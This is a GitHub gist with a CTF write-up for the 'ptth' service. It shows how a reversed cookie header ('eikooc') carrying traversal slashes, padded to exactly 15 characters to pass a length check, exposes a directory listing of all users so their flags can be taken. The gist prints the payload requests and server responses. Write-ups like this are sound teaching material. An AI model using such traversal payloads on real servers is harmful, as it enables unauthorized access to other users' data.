Skip to content

Instantly share code, notes, and snippets.

@vladvis vladvis/ptth.md
Created May 29, 2019

Embed
What would you like to do?

ptth

We noticed that server logs debug info to the stdout. First idea was path traversal, because server stores files with the names from the requests: path = './' + eikooc + '/' + path Path traversal in the path didn't work at all, but eikooc (reversed cookie) was a user directory. So we sent such payload:

TEG / PTTH\1.1
eikooc: ../

And we got log message:

[PID 19] [] TEG  SERVER

TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

Ok, we checked condition for this message:

if (some_function(some_ptr) == 15)
{
  ...
} else {
  throw_error("Fucked up cookie.");
}

Hmm, it looks like some_function is just strlen and some_ptr is eikooc pointer. And finally we sent such payload (with exactly 15 slashes in the eikooc):

TEG / PTTH\1.1
eikooc: ////////////////////

PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>

Got it! This request lists all usernames and now we can extract all flags the same way as jury does.

Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.